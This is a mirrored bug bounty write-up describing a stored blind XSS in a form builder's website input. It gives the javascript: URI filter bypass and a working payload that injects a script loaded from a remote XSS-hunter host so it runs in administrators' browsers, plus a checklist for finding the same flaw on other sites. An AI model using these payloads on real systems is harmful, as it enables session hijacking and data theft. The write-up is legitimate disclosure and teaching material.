Hack your form new vector for BXSS

Hack Your Form-New vector for Blind XSS | by Youssef A. Mohamed - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Hack Your Form-New vector for Blind XSS Hello Pentesters, Youssef A. Mohamed Follow ~3 min read · March 12, 2019 (Updated: December 8, 2021) · Free: Yes I'm Youssef A. Mohamed aka GeneralEG Security Researcher @ CESPPA , Cyber Security Engineer @ Squnity and SRT Member @ Synack Today I'm gonna share a juicy finding with you. Talking about bypassing a couple of filters to execute malicious javascript codes easily and achieve a Blind Stored XSS. "I found this issue in a lot of targets so, I will take one of these programs as an example." The program is private so let's call it redacted.com Recently I was testing in this program and after some recon, I found that the website offers a specific service (Create Forms). How does this service work? 1)Creator User create a form 2)Creator User share the link with visitor 3)Visitor fill the form 4)The filled information will be available for the Form's Creator at redacted.com/manager/{Form ID}/ So while testing the "Creating form" functions, I've found that there's a Website input I made a simple form. Then opened as the form as a visitor. At the first I tried to bypass it as the basic style: (thought that if I wrote website.com?" payload it will execute) So, I entered: https://example.com/?"%22" ( " + url encoded + html entities encoded) Then opened the creator account to see what happened. But unfortunately, the filter encoded the double quotes. https://example.com"%22" and noticed that the Link rendered in (a tag) So, I decided to grab a cup of coffee :"D After a few minutes of deep thinking while drinking my coffee about how I will bypass this one. I decided to start fuzzing in this input especially.. {Enter Website} While I'm fuzzing I noticed that the filter accepted test:https://example.com ! then tried javascript:https//evil.com and it worked :D "Evil loud laugh" Now I'm sure that there's XSS here but it's need real website merged with my payload so i wrote this one. javascript:x='http://x.c'alert('xss');// Finally executed! But wait we want to make it Blind XSS to attack the real admins (The best scenario). So the last payload was: javascript:eval('a=document.createElement(\'script\');a.src=\'https://generaleg.xss.ht\'document.body.appendChild(a)');s='https://s.com' ¯\_(ツ)_/¯ That's it! Notes: 80% of my targets which have the Website's input was vulnerable to the same scenario. To make sure that your target is vulnerable to the same problem you need a few steps to make sure: A. Check if the website is accepting other URI scheme like javascript:https://generaleg0x01.com or not? B. Check if the website is rendering your https://generaleg0x01.com on HTML 'a' tag or not? And in the most similar situations, the same payload will work perfectly. Timeline: 20 December, 2018: Report Submitted 25 December, 2018: Report Reviewed and Triaged 30 December, 2018: Report Resolved & 800$ Bounty Awarded Learned lessons: Fuzz as much as you can. Don't try one technique to bypass the filter to try other techniques. Happy Hacking! #security #blind-xss #cesppa #generaleg #bug-bounty Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).